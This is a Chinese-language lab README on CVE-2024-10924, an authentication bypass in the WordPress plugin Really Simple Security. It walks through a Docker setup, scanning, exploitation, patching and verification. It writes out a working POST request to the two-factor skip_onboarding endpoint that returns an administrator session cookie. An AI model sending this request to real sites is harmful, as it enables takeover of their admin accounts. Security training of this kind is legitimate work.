CVE-2024-10924 - Really Simple Security中的认证绕过漏洞
概述 本项目演示了CVE-2024-10924的利用与缓解措施,该漏洞是WordPress插件“Really Simple Security”中的一个严重认证绕过漏洞。
步骤1:环境搭建
启动易受攻击的WordPress环境: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d
验证容器正在运行: docker ps
访问WordPress: http://localhost:1337
所需工具:
步骤2:漏洞扫描
对目标运行GVM扫描:
步骤3:利用
方法A - 自动化Python利用: python exploit.py
方法B - 手动Burp Suite:
拦截发往 http://localhost:1337 的流量
发送POST请求: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json
{"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}
观察响应,其中包含Set-Cookie头,包含管理员会话
预期结果:
步骤4:缓解措施
应用补丁以阻止脆弱端点: .\patch.ps1
功能:
步骤5:验证
重新运行利用(方法A或B): python exploit.py
缓解后的预期结果:
附加说明
停止环境: docker-compose down
查看容器日志: docker-compose logs -f
合法访问WordPress管理后台: http://localhost:1337/wp-admin (检查docker-compose.yml中的凭据)